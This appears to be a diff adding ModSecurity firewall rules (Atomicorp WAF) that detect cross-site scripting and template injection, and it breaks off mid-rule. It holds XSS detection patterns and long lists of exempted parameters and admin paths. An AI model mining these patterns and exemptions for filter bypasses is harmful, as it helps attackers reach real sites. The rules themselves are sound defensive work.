+SecRule ARGS|!ARGS:/^dnn/|!ARGS:html|!ARGS:/analitic/|!ARGS:/analytic/|!ARGS:ta|!ARGS:/wpcf7/|!ARGS:/htmlcode/|!ARGS:areas|!ARGS:templatecode|!ARGS:code|!ARGS:/^jform/|!ARGS:/content/|!ARGS:/tpl/|!ARGS:/header/|!ARGS:/rawcode/|!ARGS:/^tv/|!ARGS:/footer/|!ARGS:livezillacode|!ARGS:/script/|!ARGS:p_posts_va|!ARGS:description_short_1|!ARGS:senddescription|!ARGS:widget_code|!ARGS:/fckeditor/|!ARGS:emailmessage|!ARGS:wrap|!ARGS:/template/|!ARGS:cid|!ARGS:form_confirmation_message "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,t:lowercase,capture,id:340113,rev:36,severity:2,msg:'Atomicorp.com WAF Rules: Potential attempt to inject javascript ',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecMarker END_PLESK1
+# Rule 340020:
+#XSS in referrer and UA headers
+#SecRule REQUEST_HEADERS:REFERER|REQUEST_HEADERS:User-Agent "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|activexobject|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parent|special)folder|< ?iframe |\.innerhtml|\<input|lowsrc|mocha\:|\bon(?:abort|blur|change|click|submit|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up)|resize|select|unload)\b ?=|settimeout|shell\:|\b(?:vb|java|j|live)script(?: ?>|\")|>(?: |\+)?<(?: |\+)?img(?: |\+)?src(?: |\+)?=(?: |\+)?(?:ht|f)tps?:/)"          "phase:2,deny,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,capture,id:340020,rev:34,severity:2,msg:'Atomicorp.com WAF Rules: XSS in referrer and UA headers',chain,logdata:'%{TX.0}'"
+#SecRule REQUEST_HEADERS:REFERER "!(^http://%{SERVER_NAME}/|pagead[0-9]\.googlesyndication\.com/pagead/|/gills\.swf?txt=<a href= ?asfunction:_root\.launchurl|vbscript.*convert.*&hl=.*client=|convert.*vbscript.*search|\?_rw=http|/tinymce/jscripts/|/pageear_[a-z]\.swf|/search\?hl=.*q=.*(?:vb|java)script)" "chain,t:none,t:lowercase"
+#SecRule REQUEST_HEADERS:REFERER|REQUEST_URI "!(/plugins/editors/tinymce/jscripts/|/modules/tinymce/tinymce/jscripts|/phpinfo_iframe\.php|/tinymce/jscripts/|swf/pageear_[a-z]\.swf\?|!(/vbscript/|power script))" "t:none,t:lowercase"
+
+#special case for drupal for 340147 above
+SecRule REQUEST_URI "node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:320474,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS|ARGS_NAMES|!ARGS:/^dbem/|!ARGS:/suffix/|!ARGS:areas|!ARGS:templatecode|!ARGS:optional_head|!ARGS:/^extra/|!ARGS:op|!ARGS:file|!ARGS:notice|!ARGS:/formcode/|!ARGS:/tracking/|!ARGS:/jscode/|!ARGS:video1|!ARGS:paragrafo|!ARGS:value[value]|!ARGS:sidebar|!ARGS:/statement/|!ARGS:text1|!ARGS:offertext|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/header/|!ARGS:/desc/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:match_report|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:diz|!ARGS:/custom_code/|!ARGS:project_company|!ARGS:antwoord|!ARGS:project_company|!ARGS:value|!ARGS:/^fck/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "((?:<|/) ?(?:(?:java|vb)?script|about|applet|activex|chrome)|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(>|<)|< ?/?i?frame|\%env)""t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase"
+
+
+#XSS generic filter and suspicious web code detector
+SecRule REQUEST_URI "!(?:/(?:admin/(?:(?:build(?:/translate|language/edit|/edit)?|catalog_category)/|settings/site-information|catalog/edit)|(?:miadmin/catalog_product|sitebuilder)/|wizard/edit/html|node/add/|filter-xss|(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/edit))|\/(?:admin\/(?:surveys\/[0-9]+\/edit\/|\?page=spageedit)|node\/[0-9]+\/(?:webform\/components\/|edit|clone))|^(?:(/~[a-z0-9]+)?/\?q=node/[0-9]+/edit|\?(?:s|v))|c=myaccount&m=update_profile$|mt\.cgi|/nav\.php\?nav=addnews|/products\.php\?action=(?:edit|update)|/systemadmin/configproducts\.php|/admin/catalog_product/|/index\.php\?tab=admincatalog|/admin/settings/customerror|^/ndxz-?studio/\?a=|/editform\?|/wizard/edit/|\?tab=admin|\?content=admin|\?action=modif|\?exec=articles_edit$|/admin/preview\.php|/sysext/tstemplate/|/site-builder/|/(?:new|edit)/[0-9]+/(?:confirm|add)|/admin/editform|/cms/admin/editform|^/filemanager/filemanager\.php|^/([a-z]+/)?admin/structure/|^/support/agent/|^/content/item/edit/|^/index\.php/admin/system_config/|^/administrator/\?option=com_civicrm|^/za/zcadm|^/blog/roller-ui/authoring/entryedit|^/admin/(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/(?:edit|add))|^/em/admin/\?page=send|^/eprocservice/supplierinboundservice|^/cp/index\.php\?controller=adminmodules|^/services?/bmwidget\.json|^/[a-z0-9/]+?\?fl_builder)" "id:333840,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:7"
+        SecAction "phase:2,id:334387,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"
+
+#Filenames
+SecRule REQUEST_FILENAME "!(/file-manager/edit/)" "id:366840,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:2"
+        SecAction "phase:2,id:336687,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"
+
+SecRule REQUEST_URI "(?:^/[a-z0-9/]+?panels/ajax/editor/edit-pane/panelizer|^/[a-z]+/media/ajax/image|^/admin/[a-z]+/(?:[0-9]+|create)|^/file/ajax/|^/manage/[a-z0-9]+/edit/|^/smb/file-manager/code-editor/|^/index\.php\?route=extension/d_quickcheckout/[a-z0-9]+/update|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "id:366870,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:text|!ARGS:settings|!ARGS:post "@rx {{.*?}}" "id:340130,rev:5,phase:2,deny,status:403,log,auditlog,capture,t:none,msg:'Atomicorp.com WAF Rules: AngularJS client side template injection detected',logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}', tag:'attack-xss',ctl:auditLogParts=+E,severity:'CRITICAL'"
+
+SecRule REQUEST_URI "^/index\.php\?ajax-proxy/" "id:321114,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS" 
+
+# Rule 340147: Generic XSS filter
+SecRule REQUEST_URI|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS|!ARGS:input_65|!ARGS:/^cont/|!ARGS:/introtext/|!ARGS:_message|!ARGS:/com_liferay/|!ARGS:/fbmcc/|!ARGS:/ide_/|ARGS_NAMES|!ARGS:/^aftax/|!ARGS:/bsr_/|!ARGS:nav-menu-data|!ARGS:/contact_map/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/signature/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:perch_39__blocks_4_youtubevideo|!ARGS:/^rwx97/|!ARGS:/infobox/|!ARGS:frdata|!ARGS:itdata  "(?:< ?/? ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome|qx?ss|embed)|< ?/?i?frame\b|< ?img src ?=|< ?base href ?=)"  "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:340147,rev:163,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+# Rule 340149:  XSS injection
+SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|!ARGS:/^jms/|!ARGS:/^cont/|!ARGS:/_com_liferay/|!ARGS:/fbmcc/|!ARGS:/refuse_code/|!ARGS:/ide_/|!ARGS:/bsr_/|!ARGS:/^aftax/|!ARGS:emailMessage|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:pr_text|!ARGS:/introtext/|!ARGS:/^asteria/|!ARGS:/^dbem/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:agreement|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:actionfilter|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:payment_extrainfo|!ARGS:UserData|!ARGS:clone|!ARGS:areas|!ARGS:templatecode|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^data\[News\]/|!ARGS:d|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:ide_text|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:text1|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:tracking_code|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/desc/|!ARGS:/footer/|!ARGS:/embed/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:/signature/|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/infobox/  "(?:< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|window\.location|asfunction:_root\.launch)" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,capture,id:340149,rev:162,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecRule REQUEST_BODY "^< ?\??( |\+)?xml" "phase:2,id:333704,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"
+
+#suspicious code
+SecRule REQUEST_URI "(?:/admin/(?:[a-z]+/(?:save|module/update/|edit)|publish|\?op=edit|content/update|appearance/settings/|d/1/|pages/update|[a-z/]+/editform|block_edit)|/secure/roundcube/|/backend\.php/property/save|/edit/|/home/add|/\?act=edit|/site-content/|/project/update/|/index\.php\?option=com_?(?:easyblog|resource&controller=article|comprofiler&task=my_profile|aclassif)|/index\.php/datafeedmanager/adminhtml_datafeedmanager/save|/index\.php\?mode=(?:new|edit)story|^/filemanager/filemanager\.php|^/user_info/edit_profile/|/admin/editor/|^/user\.php\?op=edituser&htmltext=|^/admin/structure/|option=com_rsform&task=forms\.edit|^/ndxz-?studio/\?a=|^/support/agent|^/elements/save|^/settings/in_place_save/|^/ndxz2/|^/([a-z]+/)?index\.php/admin/s(?:ystem_config|ubject)/|^/(a-z)+/admin/programs/update_program|^/backoffice/\?op=edit|^/za/zcadm|^/efthuko\.php\?mod=editnews|^/mm-panel/index\.php|/ndxzstudio/|destination=admin/structure|/cms/db_manage\.php|^/mod_pagespeed|^/\?q=admin/appearance/settings|^/articles/(?:save|add|edit)|^/\?ptype=|/whmadmcp/addonmodules\.php|^/sh/file/|/multimediasave\.do|^/cms/|^/panel/index\.php|^/microagility/([a-z]+/)?useredit\.php|^/content_multigroup/|^/posts/edit|^/teksty/edytuj_akapit|^/egisportal/|/templatesavechanges|^/\?_task=mail|^/cpsess[0-9]+/scripts2?/|control_panel/manage\?p_p_id=com_liferay|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "phase:2,id:333732,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"
+
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|!ARGS:allowedTags|!ARGS:compiled_css|!ARGS:/^addon/|!ARGS:/content/|!ARGS:fl_builder_data|!ARGS:/shortcode/|!ARGS:frdata|!ARGS:itdata|!ARGS:/document/|!ARGS:affiliatelinks|!ARGS:input_13\.2|!ARGS:prop_des|!ARGS:/footer/|!ARGS:/header/|!ARGS:/body/|!ARGS:/note/|!ARGS:input_65|!ARGS:/description/|!ARGS:con|!ARGS:/text/|!ARGS:/mail/|!ARGS:act|!ARGS:jfo|!ARGS:con|!ARGS:/html/|!ARGS:customized|!ARGS:/signature/|!ARGS:page_settings|!ARGS:/message/|XML:/* "@rx 